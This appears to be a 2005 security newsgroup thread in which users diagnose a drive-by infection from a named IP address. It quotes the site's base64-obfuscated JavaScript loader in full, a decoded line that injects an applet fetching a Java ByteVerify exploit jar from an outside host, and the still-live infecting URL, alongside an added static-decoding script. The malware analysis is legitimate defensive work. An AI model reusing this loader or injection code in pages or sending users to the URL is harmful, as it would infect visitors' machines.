- Javasys.exe: More of the same or new?
- Posted by MaxPower on September 4th, 2005
After visiting a website I found an executable named
\WINNT\Java\Javasys.exe running on my system.
Almost immediately, ZoneAlarm told me that this Javasys.exe was trying
to access the Internet.
Just to see what would happen, I allowed it to access the Internet and
it downloaded another executable, which triggered a Zone Alarm security
alert:
"nnnm32 is trying to set 'antivirus' to run each time your computer is
started".
Actually the name of nnnm32.exe may vary: in a few tries I saw it named
comm.exe, ping.exe and so on.
Allowed to access the Internet, nnnm32.exe downloaded a third
executable (timer.exe) which in turn tried to access the Internet.
I then did a scan for spyware with the latest versions of all the
following:
ZoneAlarm 6 Pro
Ad-Aware 1.06r1 Personal (free)
SpyBot S&D 1.4
SpySweeper 4.04
Spyware Doctor 3.2.1.
AntiVIR Personal 6.31 (free)
but none of them found any threat (!)
A couple of weeks later, after downloading an updated virus definition
file, I scanned the system again with AntiVIR and this time it found in
timer.exe a backdoor named BDS/Webdor.AD.1
My configuration:
- Windows 2000 Professional SP4, IE6 Security set to "medium";
- ZoneAlarm Pro 6;
- AntiVIR Personal Edition 6.31 (free);
- SpyBot S&D 1.4 w/ Teatimer (resident antispyware).
For those interested, the URL spreading this malware is the following:
***********************************************************
DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
http://198.88.20.158/gal/403/index.html
***********************************************************
My question is: How can I prevent any executable from installing in such an
insidious way?
With IE6 Security set to "High" this malware could not install, but of
course I would like to keep IE6 Security set to "Medium", otherwise
navigation is most impractical.
Thank you in advance for any advice.
- Posted by hatschi on September 4th, 2005
You can use any website you want. The only thing to care about is:
I will write this in big letters, so that everyone sees the importance...
DON'T USE THE ADMINISTRATOR ACCOUNT FOR SURFING OR EVEN WORKING!!!
Only use it to install soft- or hardware. And only that kind of software
you got from a source you can trust.
I suggest that everyone (EVERYONE) read a book about security!
- Posted by Mark on September 4th, 2005
MaxPower wrote:
<snip>.
Since the attack starts with a javascript, I suspect that disabling
javascript would be the only sure way of preventing this particular
attack. No matter what browser you are using. Which of course you do
by setting your security to high.
With that said, this particular script seems to be looking for Internet
Explorer so it may be exploiting a flaw in that particular browser.
Keep in mind I didn't go through the entire process of infecting my
machine so I'm not sure about this. But, if this is the case, using a
different browser may have prevented this particular attack.
What might be interesting is if anyone knows of something that could
block 'suspicious looking' scripts without totally disabling javascript.
I ask because I found the first one to be suspicious mainly because of
the attempts to obfuscate the code, i.e. it's all smooshed into one
line and the meat of it is base64 encoded.
The index.html attempts to download this:
<SCRIPT language="JavaScript"
SRC="http://198.88.20.158/iSponsor.js?bannerid=403"></SCRIPT>
That script is: (line breaks inserted by my news client)
var b64, f64, d;
// replace zero bytes with 1 after decoding
function a(s) { var i; for (i = 0; i < s.length; i++) if (!s[i]) s[i] = 1; return s; }
// UTF-8 byte array -> string
function u(d) {
  var r = new Array; var i = 0;
  while (i < d.length) {
    if (d[i] < 128) { r[r.length] = String.fromCharCode(d[i]); i++; }
    else if ((d[i] > 191) && (d[i] < 224)) { r[r.length] = String.fromCharCode(((d[i] & 31) << 6) | (d[i+1] & 63)); i += 2; }
    else { r[r.length] = String.fromCharCode(((d[i] & 15) << 12) | ((d[i+1] & 63) << 6) | (d[i+2] & 63)); i += 3; }
  }
  return r.join("");
}
// base64 string -> byte array
function t(t) {
  var d = new Array; var i = 0;
  t = t.replace(/\n|\r/g, ""); t = t.replace(/=/g, "");
  while (i < t.length) {
    d[d.length] = (f64[t.charAt(i)] << 2) | (f64[t.charAt(i+1)] >> 4);
    d[d.length] = (((f64[t.charAt(i+1)] & 15) << 4) | (f64[t.charAt(i+2)] >> 2));
    d[d.length] = (((f64[t.charAt(i+2)] & 3) << 6) | (f64[t.charAt(i+3)]));
    i += 4;
  }
  if (t.length % 4 == 2) d = d.slice(0, d.length - 2);
  if (t.length % 4 == 3) d = d.slice(0, d.length - 1);
  return d;
}
// build the base64 lookup tables, then decode; the result is passed to eval
function b(s) {
  var b64s = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
  b64 = []; f64 = [];
  for (var i = 0; i < b64s.length; i++) { b64[i] = b64s.charAt(i); f64[b64s.charAt(i)] = i; }
  return u(a(t(s)));
}
eval(b("ZnVuY3Rpb24gX19pbmNyZW1lbnRfY291bnRlcigpe3ZhciBjb3V
udD05MDEyODM7Y291bnQrKzt9O2Z1bmN0aW9uIF9fX2RvX2NoZWNraW5nKCkgewp2YXIgY2Fwcz1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnX19fY19jYXBzJyk7dmFyIGN
UeXBlPTA7dmFyIHZlcnNpb249MDtpZiAoKHR5cGVvZihjYXBzKSE9J3VuZGVmaW5lZCcpJiYodHlwZW9mKGNhcHMuY29ubmVjdGlvblR5cGUpIT0ndW5kZWZpbmVkJykmJih
0eXBlb2YoY2Fwcy5nZXRDb21wb25lbnRWZXJzaW9uKSE9J3VuZGVmaW5lZCcpKXsKY1R5cGU9Y2Fwcy5jb25uZWN0aW9uVHlwZTsKdmVyc2lvbj1jYXBzLmdldENvbXBvbmV
udFZlcnNpb24oJ3swOEIwRTVDMC00RkNCLTExQ0YtQUFBNS0wMDQwMUM2MDg1MDB9JywnQ29tcG9uZW50SUQnKTsKdmFyIHNWZXJzaW9uID0gY2Fwcy5nZXRDb21wb25lbnR
WZXJzaW9uKCd7MDhCMEU1QzAtNEZDQi0xMUNGLUFBQTUtMDA0MDFDNjA4NTAwfScsJ0NvbXBvbmVudElEJyk7dmFyIHNzOwp2YXIgc3NudW07c3MgPSBzVmVyc2lvbi5zcGx
pdCgnLCcpO3NzbnVtID0gcGFyc2VJbnQoc3NbMl0pOwppZiAoY2Fwcy5jb25uZWN0aW9uVHlwZT09J21vZGVtJyAmJiBzc251bSA8IDM4MTApewpfX2luY3JlbWVudF9jb3V
udGVyKCk7ZG9jdW1lbnQud3JpdGUoJycpO31lbHNle2RvY3VtZW50LndyaXRlKCcnKTt9fWVsc2V7c2V0VGltZW91dCgnX19fZG9fY2hlY2tpbmcoKScsMjAwKTt9fTtpZiA
oKG5hdmlnYXRvci5hcHBOYW1lPT0nTWljcm9zb2Z0IEludGVybmV0IEV4cGxvcmVyJykmJih0eXBlb2YoZG9jdW1lbnQuYWxsKSE9J3VuZGVmaW5lZCcpKXtkb2N1bWVudC5
3cml0ZSgiPGRpdiBpZD0nX19fY19jYXBzJyBzdHlsZT0nZGlzcGxheTpub25lOyBiZWhhdmlvcjp1cmwoI2RlZmF1bHQjY2xpZW50Y2FwcyknPjwvZGl2PiIpO19fX2RvX2N
oZWNraW5nKCk7fTtkb2N1bWVudC53cml0ZSgiPCEtLSBQUk9NT1RJT04gQVJFQS0tPiAgICAgIDxkaXYgYWxpZ249J2NlbnRlcic+PGZvbnQgZmFjZT0nQXJpYWwsIEhlbHZ
ldGljYSwgc2Fucy1zZXJpZicgc2l6ZT0nNCc+PGEgaHJlZj0nJyB0YXJnZXQ9J19ibGFuayc+PC9hPjwvZm9udD48L2Rpdj48IS0tIEVORCAtLT4gICAgICAgICIpOw=="))
The base64 encoded part roughly decodes to:
function __increment_counter() { var count = 901283; count++; };
function ___do_checking() {
  var caps = document.getElementById('___c_caps');
  var cType = 0; var version = 0;
  if ((typeof(caps) != 'undefined') && (typeof(caps.connectionType) != 'undefined') && (typeof(caps.getComponentVersion) != 'undefined')) {
    cType = caps.connectionType;
    version = caps.getComponentVersion('{08B0E5C0-4FCB-11CF-AAA5-00401C608500}', 'ComponentID');
    var sVersion = caps.getComponentVersion('{08B0E5C0-4FCB-11CF-AAA5-00401C608500}', 'ComponentID');
    var ss;
    var ssnum; ss = sVersion.split(','); ssnum = parseInt(ss[2]);
    if (caps.connectionType == 'modem' && ssnum < 3810) { __increment_counter(); document.write('');
    } else { document.write('');
    }
  } else { setTimeout('___do_checking()', 200);
  }
};
if ((navigator.appName == 'Microsoft Internet Explorer') && (typeof(document.all) != 'undefined')) {
  document.write("<div id='___c_caps' style='display:none; behavior:url(#default#clientcaps)'></div>");
  ___do_checking();
};
document.write("<!-- PROMOTION AREA--> <div align='center'><font face='Arial, Helvetica, sans-serif' size='4'><a href='' target='_blank'></a></font></div><!-- END --> ");
Keep in mind I'm not a programmer so I don't know exactly what the above
does, but I just find the obfuscation suspicious.
--
Mark
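An added example, not code from Mark or anyone else in this thread and not the real iSponsor.js: a Node.js script that recovers the eval(b("...")) payload statically, by stripping the wrap whitespace a news client or forum inserts and then base64/UTF-8 decoding the literal, so the payload can be read without ever running the script. It also reports the surface traits Mark found suspicious. The obfuscated sample and the payload text inside it are constructed for the demo.

```javascript
// Added example for this thread, not code from any poster: recover the
// eval(b("<base64>")) payload statically, without executing the script.

// Constructed stand-in for the decoded payload (the real one is quoted above).
const PAYLOAD_PLAINTEXT =
  "if (navigator.appName=='Microsoft Internet Explorer'){" +
  "document.write('<div id=\\'c\\' style=\\'display:none\\'></div>');}";

// Base64 of that payload, broken into lines and with one stray space, the way
// a news client or forum wraps a long unbroken token (constructed).
const WRAPPED_B64 = Buffer.from(PAYLOAD_PLAINTEXT, "utf8").toString("base64")
  .replace(/(.{40})/g, "$1\n")
  .replace(/^(.{10})/, "$1 ");

// Constructed obfuscated script in the same shape as the quoted iSponsor.js:
// a custom decoder b() followed by eval() of its output.
const OBFUSCATED_SAMPLE =
  "var b64,f64,d;function b(s){/* custom base64 + utf-8 decoder */}\n" +
  'eval(b("' + WRAPPED_B64 + '"))';

// Undo the wrap whitespace, then base64 decode and interpret as UTF-8, which is
// what the script's t() and u() helpers do (its a() quirk of turning zero
// bytes into 1 is irrelevant for text payloads, so it is not reproduced).
function decodeB64Utf8(text) {
  return Buffer.from(text.replace(/\s+/g, ""), "base64").toString("utf8");
}

// Find every eval(<name>("<base64 literal>")) call and return the decoded
// strings; nothing is evaluated, so the payload can be read safely.
function extractEvalPayloads(script) {
  const re = /eval\(\s*\w+\(\s*"([A-Za-z0-9+\/=\s]+)"\s*\)\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(script)) !== null) out.push(decodeB64Utf8(m[1]));
  return out;
}

// Cheap static indicators of the kind Mark asks about. None proves malice on
// its own; together they are what made this script look wrong to a reader.
function obfuscationIndicators(script) {
  const lines = script.split(/\r?\n/);
  return {
    evalOfDecodedData: /eval\(\s*\w+\(/.test(script),
    usesFromCharCode: /String\.fromCharCode/.test(script),
    longBase64Literal: /"[A-Za-z0-9+\/=\s]{100,}"/.test(script),
    longestLine: Math.max(...lines.map((l) => l.length)),
  };
}

// Demo run: print the recovered payload and the indicator summary.
console.log(extractEvalPayloads(OBFUSCATED_SAMPLE)[0]);
console.log(obfuscationIndicators(OBFUSCATED_SAMPLE));
```

Run it with node. The point is that nothing in the suspect script is executed: the payload is recovered from the source text alone, which is the habit to keep when looking at scripts like this one.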
- Posted by David H. Lipman on September 5th, 2005
From: "MaxPower" <cardin@usa.com>
|
| After visiting a website I found an executable named
| \WINNT\Java\Javasys.exe running on my system.
|
| Almost immediately, ZoneAlarm told me that this Javasys.exe was trying
| to access the Internet.
|
| Just to see what would happen, I allowed it to access the Internet and
| it downloaded another executable, which triggered a Zone Alarm security
| alert:
|
| "nnnm32 is trying to set 'antivirus' to run each time your computer is
| started".
|
| Actually the name of nnnm32.exe may vary: in a few tries I saw it named
| comm.exe, ping.exe and so on.
|
| Allowed to access the Internet, nnnm32.exe downloaded a third
| executable (timer.exe) which in turn tried to access the Internet.
|
|
| I then did a scan for spyware with the latest versions of all the
| following:
|
| ZoneAlarm 6 Pro
| Ad-Aware 1.06r1 Personal (free)
| SpyBot S&D 1.4
| SpySweeper 4.04
| Spyware Doctor 3.2.1.
| AntiVIR Personal 6.31 (free)
|
| but none of them found any threat (!)
|
| A couple of weeks later, after downloading an updated virus definition
| file, I scanned the system again with AntiVIR and this time it found in
| timer.exe a backdoor named BDS/Webdor.AD.1
|
| My configuration:
|
| - Windows 2000 Professional SP4, IE6 Security set to "medium";
| - ZoneAlarm Pro 6;
| - AntiVIR Personal Edition 6.31 (free);
| - SpyBot S&D 1.4 w/ Teatimer (resident antispyware).
|
| For those interested, the URL spreading this malware is the following:
|
| ***********************************************************
| DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
| http://198.88.20.158/gal/403/index.html
| ***********************************************************
|
| My question is: How can I prevent any executable from installing in such an
| insidious way?
|
| With IE6 Security set to "High" this malware could not install, but of
| course I would like to keep IE6 Security set to "Medium", otherwise
| navigation is most impractical.
|
| Thank you in advance for any advice.
Download MULTI_AV.EXE from the URL --
http://www.ik-cs.com/programs/virtools/Multi_AV.exe
It is a self-extracting ZIP file that contains the Kixtart Script Interpreter {
http://kixtart.org ; Kixtart is CareWare }, three batch files, five Kixtart scripts, one Link
(.LNK) file, a PDF instruction file and two utilities, UNZIP.EXE and WGET.EXE. It will
simplify the process of using the Sophos, Trend and McAfee Anti Virus Command Line Scanners to
remove viruses, Trojans and various other malware.
C:\AV-CLS\StartMenu.BAT -- { or Double-click on 'Start Menu' in C:\AV-CLS}
This will bring up the initial menu of choices and should be executed in Normal Mode. This
way all the components can be downloaded from each AV vendor’s web site.
The choices are Sophos, Trend, McAfee, Exit the menu and Reboot the PC.
You can choose to go to each menu item and just download the needed files or you can
download the files and perform a scan in Normal Mode. Once you have downloaded the files
needed for each scanner you want to use, you should reboot the PC into Safe Mode [F8 key
during boot] and re-run the menu again and choose which scanner you want to run in Safe
Mode. It is suggested to run the scanners in both Safe Mode and Normal Mode.
When the menu is displayed hitting 'H' or 'h' will bring up a more comprehensive PDF help
file.
To use this utility, perform the following...
Execute; Multi_AV.exe { Note: You must use the default folder C:\AV-CLS }
Choose; Unzip
Choose; Close
Execute; C:\AV-CLS\StartMenu.BAT
{ or Double-click on 'Start Menu' in C:\AV-CLS }
NOTE: You may have to disable your software FireWall or allow WGET.EXE to go through your
FireWall to allow it to download the needed AV vendor related files.
* * * Please report back your results * * *
--
Dave
http://www.claymania.com/removal-trojan-adware.html
http://www.ik-cs.com/got-a-virus.htm
- Posted by Imhotep on September 5th, 2005
MaxPower wrote:
I went to this site (I use linux/FreeBSD and have java off). Here is some
info for you:
The IP address range is owned by Verio. You might want to contact them about
this server:
OrgAbuseHandle: VAC5-ARIN
OrgAbuseName: Verio Abuse Contact
OrgAbusePhone: +1-800-551-1630
OrgAbuseEmail: abuse@verio.net
After looking at speedslim's records it appears that this is a spoofing
site...
Imhotep
- Posted by Imhotep on September 5th, 2005
Mark wrote:
((d[i+1]&63)<<6)|(d[i+2]&63));i+=3;}}return
{
....good job....
Im
- Posted by Imhotep on September 5th, 2005
hatschi wrote:
Yup! Good advice...
- Posted by Ant on September 5th, 2005
"Mark" wrote:
Keep up to date with your security patches, or don't use IE, and don't
visit such dubious sites.
In this particular case you could disable Java and lose very little
functionality. Note that Java is not the same thing as Javascript.
Sites tend not to use Java applets for navigation. However, the site
looks decidedly dodgy, so there could be other exploits lurking there
(e.g. for Active-X).
Or possibly any browser that uses an exploitable Java virtual machine.
[snip]
That's strange, I decoded the following for the above function
("document.write" line wrapped, and http munged to h--p)
function __increment_counter() {
document.write("<APPLET ARCHIVE=\"h--p://209.190.137.29/user/ds/c.jar\"
codebase=\"h--p://209.190.137.29/user/ds/\"
CODE=\"BB.class\" WIDTH=1 HEIGHT=1>
<param name=\"userid\" value=\"global/ds-1\"></APPLET>");};
The file c.jar is a Java archive (a zip file) containing:
BB.class
Beyond.class
BeyondInterface.class
Dummy.class
Manifest.mf
VerifierBug.class
The file VerifierBug.class contains the Java byte verify exploit
(Troj/BytVrfy-A) according to Sophos. Once this runs, your system is
open for the site to install its payload. I didn't dig further into
the site's code to see what that malware might be.
- Posted by David H. Lipman on September 5th, 2005
From: "Ant" <not@home.today>
<snip>
| The file c.jar is a Java archive (a zip file) containing:
| BB.class
| Beyond.class
| BeyondInterface.class
| Dummy.class
| Manifest.mf
| VerifierBug.class
|
| The file VerifierBug.class contains the Java byte verify exploit
| (Troj/BytVrfy-A) according to Sophos. Once this runs, your system is
| open for the site to install its payload. I didn't dig further into
| the site's code to see what that malware might be.
|
McAfee as well...
9/5/2005 6:35:38 PM Deleted (Clean failed) DLIPMAN-1\lipman D:\temp\IE6\Temporary Internet Files\Content.IE5\WCZFECUD\c[1].jar\C[1].JAR Exploit-ByteVerify
and
9/5/2005 6:38 PM Infected DLIPMAN-1\lipman C:\Documents and Settings\lipman\Desktop\VerifierBug.class Exploit-ByteVerify (Trojan) (Removable)
Another case of a .CLASS file in a Java Jar (ZIP type file) having an infector. This is why
you must enable "scan archive files" in any/all anti virus products.
--
Dave
http://www.claymania.com/removal-trojan-adware.html
http://www.ik-cs.com/got-a-virus.htm
- Posted by Mark on September 6th, 2005
Ant wrote:
Much better put than what I was trying to say.
True, I was just guessing because the javascript I downloaded appeared
to be looking for Internet Explorer.
That is quite interesting. From what you saw, does the method of
getting the script change which script you get? What you got looks much
more interesting.
All I did was "wget http://198.88.20.158/iSponsor.js" from one of my
linux boxes. In all honesty, I was being lazy and probably shouldn't
have posted without all the information.
--
Mark
- Posted by Ant on September 6th, 2005
"Mark" wrote:
It could do, depending on how the server is set up to respond to your
HTTP request headers. For example, some will serve different content
based on the "User-Agent" field. I only tried one method, which was to
prefix "view-source:" to the URL in the IE address box. This just
fetches (GETs) the item into notepad without running or rendering
anything in the browser.
That's the same URL I used (without the "?bannerid=403" after it).
Perhaps the site doesn't like wget, perhaps iSponsor.js changes from
time to time, or perhaps it's something else I don't know about. You
could tell wget to use a User-Agent string like IE or Mozilla sends,
and see if it makes a difference.
Not at all; you sparked my interest to find an exploit!